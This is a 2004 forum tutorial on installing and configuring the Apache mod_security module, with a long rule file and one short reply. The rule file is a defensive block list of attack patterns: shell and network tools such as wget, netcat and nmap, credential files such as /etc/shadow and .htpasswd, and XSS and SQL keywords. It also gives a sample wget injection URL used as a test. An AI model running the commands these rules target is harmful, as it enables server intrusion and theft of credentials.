|
|||||||
 |
|
|
Thread Tools | Search this Thread | Display Modes |
December 30th, 2004, 00:33
|
#1 |
 Join Date: Dec 2004
Posts: 2
 |
MOD_SECURITY How-To: Protect your server from know and unknown webattacks
Mod_security Homepage: http://www.modsecurity.org/
This tutorial is focused to Linux servers. I only own servers with Redhat Enterprise ES 3.0 so I can not test on others but should work in any linux server as well: 1. Get root access: su - 2. Create a working folder and download/untar mod_security for linux: mkdir /root/mod_security cd /root/mod_security/ wget http://www.modsecurity.org/download/...y-1.8.6.tar.gz tar xzvf mod_security-1.8.6.tar.gz cd mod_security-1.8.6 3. Enter the dir corresponding to your apache version. In this case lets suppose we are running apache 2.X cd apache2 4. Lets build/install the module: apxs -cia mod_security.c On compilation, httpd.conf will be modified ( it adds mod_security to be loaded on the LoadModules section ) Note: if you don't have apxs installed you need to install httpd-devel package 5. Modify httpd.conf: Lets add in it an AddHandler directive and an include to place our mod_security config and rules. The AddHandler directive is needed to tell apache that php is dynamic content and not let apache decide looking at mimetypes. The purpose of doing this is to get /var/log/httpd/audit_log logging attacks via php scripts. Location of httpd.conf may be different depending on how you installed apache. by default is located on /etc/httpd/conf/httpd.conf Lets do it: --5.1 Find on httpd.conf this line or similar: AddType application/x-httpd-php .php Add this line under it: AddHandler php-script .php --5.2 go at the end of httpd.conf and place an include for our config/rules file (use you path if different): Include /etc/httpd/conf/modsecurity.conf 6. Content of /etc/httpd/conf/modsecurity.conf Code:
<IfModule mod_security.c>
# Only inspect dynamic requests
# (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
SecFilterEngine DynamicOnly
# Reject requests with status 403
SecFilterDefaultAction "deny,log,status:403"
# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On
SecFilterCheckUnicodeEncoding Off
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
# SecServerSignature "Microsoft-IIS/5.0"
SecUploadDir /tmp
SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
SecFilterSelective REQUEST_METHOD "!^GET$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"
# WEB-ATTACKS /bin/sh command attempt
SecFilter "/bin/sh"
# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"
# WEB-ATTACKS /bin/ps command attempt
# SecFilterSelective THE_REQUEST "ps\x20"
# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"
# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"
# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"
# WEB-ATTACKS id command attempt
SecFilter "\;id"
# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"
# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"
# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"
# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"
# WEB-ATTACKS chown command attempt
SecFilter "/chown"
# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"
# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"
# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"
# WEB-ATTACKS cc command attempt
#SecFilter "cc\x20"
# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"
# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"
# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"
# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"
# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"
# WEB-ATTACKS python access attempt
SecFilter "python\x20"
# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"
# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"
# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"
# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"
# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"
# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"
# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"
# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"
# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"
# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"
# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"
# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"
# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"
# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"
# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"
# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"
# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf" log,pass
# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd" log,pass
# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow" log,pass
# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf" log,pass
# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup" log,pass
# WEB-CGI rksh access
SecFilterSelective THE_REQUEST "/rksh"
# WEB-CGI bash access
SecFilterSelective THE_REQUEST "/bash" log,pass
# WEB-CGI perl command attempt
SecFilterSelective THE_REQUEST "/perl\?"
# WEB-CGI zsh access
SecFilterSelective THE_REQUEST "/zsh"
# WEB-CGI csh access
SecFilterSelective THE_REQUEST "/csh"
# WEB-CGI tcsh access
SecFilterSelective THE_REQUEST "/tcsh"
# WEB-CGI rsh access
SecFilterSelective THE_REQUEST "/rsh"
# WEB-CGI ksh access
SecFilterSelective THE_REQUEST "/ksh"
# WEB-CGI icat access
SecFilterSelective THE_REQUEST "/icat" log,pass
# WEB-CGI /cgi-bin/ls access
SecFilterSelective THE_REQUEST "/cgi-bin/ls" log,pass
# WEB-CLIENT Javascript document.domain attempt
SecFilter "document\.domain\("
# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"
# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"
# WEB-MISC .htpasswd access
SecFilter "\.htpasswd"
# WEB-MISC http directory traversal
SecFilter "\.\.\\"
# WEB-MISC http directory traversal
SecFilter "\.\./"
# WEB-MISC ls%20-l
SecFilter "ls\x20-l"
# WEB-MISC /etc/passwd
SecFilter "/etc/passwd"
# WEB-MISC .htaccess access
SecFilter "\.htaccess"
# WEB-MISC cd..
SecFilter "cd\.\."
# WEB-MISC /.... access
SecFilter "/\.\.\.\."
# WEB-MISC cat%20 access
SecFilter "cat\x20"
# WEB-MISC long basic authorization string
SecFilter "Authorization\: Basic "
# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"
# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"
# WEB-MISC *%0a.pl access
SecFilterSelective THE_REQUEST "/*\x0a\.pl"
# WEB-MISC apache ?M=D directory list attempt
SecFilterSelective THE_REQUEST "/\?M=D" log,pass
# WEB-MISC server-status access
SecFilterSelective THE_REQUEST "/server-status" log,pass
# WEB-MISC Transfer-Encoding\: chunked
SecFilter "chunked"
# WEB-MISC perl post attempt
SecFilterSelective THE_REQUEST "/perl/" chain
SecFilter "POST"
# WEB-MISC mod_gzip_status access
SecFilterSelective THE_REQUEST "/mod_gzip_status" log,pass
# WEB-PHP squirrel mail spell-check arbitrary command attempt
SecFilterSelective THE_REQUEST "/squirrelspell/modules/check_me\.mod\.php" chain
SecFilter "SQSPELL_APP\["
# WEB-PHP squirrel mail theme arbitrary command attempt
SecFilterSelective THE_REQUEST "/left_main\.php" chain
SecFilter "cmdd="
# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective THE_REQUEST "/quick-reply\.php" chain
SecFilter "phpbb_root_path="
# WEB-PHP phpbb quick-reply.php access
SecFilterSelective THE_REQUEST "/quick-reply\.php" log,pass
SecFilterSelective THE_REQUEST "\.php" chain
SecFilter "path=http\://"
# WEB-PHP Mambo uploadimage.php upload php file attempt
SecFilterSelective THE_REQUEST "/uploadimage\.php" chain
SecFilter "\.php"
# WEB-PHP Mambo upload.php upload php file attempt
SecFilterSelective THE_REQUEST "/upload\.php" chain
SecFilter "\.php"
# WEB-PHP Mambo uploadimage.php access
SecFilterSelective THE_REQUEST "/uploadimage\.php" log,pass
# WEB-PHP Mambo upload.php access
SecFilterSelective THE_REQUEST "/upload\.php" log,pass
# WEB-PHP phpBB privmsg.php access
SecFilterSelective THE_REQUEST "/privmsg\.php" log,pass
# WEB-PHP test.php access
SecFilterSelective THE_REQUEST "/test\.php" log,pass
# WEB-PHP phpBB viewtopic.php
SecFilterSelective THE_REQUEST "viewtopic.php" chain
SecFilterSelective "THE_REQUEST|ARG_VALUES" "(system|exec|passthru|cmd|fopen|exit|fwrite)" deny,log
# EXTRAS
SecFilter "/boot"
SecFilter "/dev"
SecFilter "/etc"
SecFilter "/initrd"
SecFilter "/lost+found"
SecFilter "/mnt"
SecFilter "/proc"
SecFilter "/root"
SecFilter "/sbin"
SecFilter "/tmp"
SecFilter "/usr/local/apache"
SecFilter "/var/spool"
SecFilter "/bin/cc"
SecFilter "/bin/gcc"
SecFilter "<[[:space:]]*script"
SecFilter "<(.|\n)+>"
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
</IfModule>
7. Restart apache webserver and mod_security will start protecting your server. 8. VERY IMPORTANT: examine /var/log/httpd/audit_log to see what is mod_security logging. You'll need to examine it to see if legitimate content is being blocked and adjust/disable the conflicting rules. For example: -These rules can conflict with phpMyAdmin if you use it: SecFilter "delete[[:space:]]+from" SecFilter "insert[[:space:]]+into" SecFilter "select.+from" - Some of these can conflict if you have forums where people posts linux related stuff: SecFilter "/boot" SecFilter "/dev" SecFilter "/etc" SecFilter "/initrd" SecFilter "/lost+found" SecFilter "/mnt" SecFilter "/proc" SecFilter "/root" SecFilter "/sbin" SecFilter "/tmp" SecFilter "/usr/local/apache" SecFilter "/var/spool" SecFilter "/bin/cc" SecFilter "/bin/gcc" So you need to examine carefuly the audit log and see what is being blocked and what rule is blocking it and why. Maybe you need to watch it for some days to fine tune it. You can test for example ... open in your browser an url like this: http://www.YOURDOMAIN_.com/MyMambo/index.php?var=wget http://www.xxx.xxx.xxx You'll get a 403 permission denied. Look at the audit log for the blocked request and you'll see that the rule " SecFilter "wget\x20" " blocked the attack. This single rule will protect you of current and future webattacks that use wget to retrieve files and inject them on your server (90% of webattacks). |
|
|
|
September 15th, 2006, 10:40
|
#3 |
Join Date: Jul 2005
Posts: 76
|
This sounds worth the effort. Logging script attacks is good, but I wonder if there's a way to automatically block ANY off-domain php includes while logging them? Any thoughts?
|
|
|
|
|
«
Previous Thread
|
Next Thread
»
| Thread Tools | Search this Thread |
| Display Modes | |
Linear Mode
|
|
All times are GMT -7. The time now is 07:29.